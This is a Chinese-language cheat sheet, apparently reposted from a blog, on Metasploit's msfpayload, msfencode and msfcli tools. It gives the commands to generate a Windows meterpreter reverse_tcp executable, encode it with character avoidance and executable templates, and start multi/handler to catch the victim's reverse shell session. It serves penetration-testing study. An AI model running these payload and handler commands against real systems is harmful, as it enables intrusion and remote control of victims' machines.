封装攻击载荷
msfpayload:
Usage:
msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>
Summary:summary and optons of payload
C:C language
Perl:Perl
Ruby:Ruby
Raw:Raw,allows payload to be piped into msfencode and other tools
Js:JavaScript
eXe:windows executable
Dll:Dll
Vba:VBA
War:war package
example:
msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter
msfpayload windows/meterpreter/reverse_tcp O:show options
msfpayload [payload] X >xx.exe
攻击载荷编码
msfencode:
Usage:
msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as:哪种体系结构编码
-b <opt> The list of characters to avoid: ‘\x00\xff‘:指定要避免的字符
-c <opt> The number of times to encode the data:编码数据的次数
-d <opt> Specify the directory in which to look for EXE templates:指定搜索exe模板的目录
-e <opt> The encoder to use:使用的编码器
-h Help banner:帮助标题
-i <opt> Encode the contents of the supplied file path:为提供的文件内容编码
-k Keep template working; run payload in new thread (use with -x):让模板继续工作;即让载荷在新线程中运行
-l List available encoders:列出可用的编码器
-m <opt> Specifies an additional module search path:制定一个额外的模板搜索路径
-n Dump encoder information:输出编码器信息
-o <opt> The output file:输出文件
-p <opt> The platform to encode for:要编码的平台
-s <opt> The maximum size of the encoded data:编码后的最大字节数
-t <opt> The output format:输出格式 bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
-v Increase verbosity:增加冗长
-x <opt> Specify an alternate executable template:指定一个备用的可执行文件模板
受害会话接收
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.x.x LPORT xxxx
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.x.x:xxxx
[*] Starting the payload handler...
也可以不打开msfconsole,用msfcli
Usage:
msfcli <exploit_name> <option=value> [mode]
Mode Description
---- -----------
(A)dvanced Show available advanced options for this module显示这个模块可用的高级选项
(AC)tions Show available actions for this auxiliary module显示辅助模块的可用行为
(C)heck Run the check routine of the selected module为所选模块检查运行历程
(E)xecute Execute the selected module执行所选模块
(H)elp You‘re looking at it baby!么么大
(I)DS Evasion Show available ids evasion options for this module
(O)ptions Show available options for this module
(P)ayloads Show available payloads for this module
(S)ummary Show information about this module
(T)argets Show available targets for this exploit module
Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=6555 E
metasploit攻击载荷独立封装和编码,布布扣,bubuko.com
原文地址:http://www.cnblogs.com/Chorder/p/3794655.html
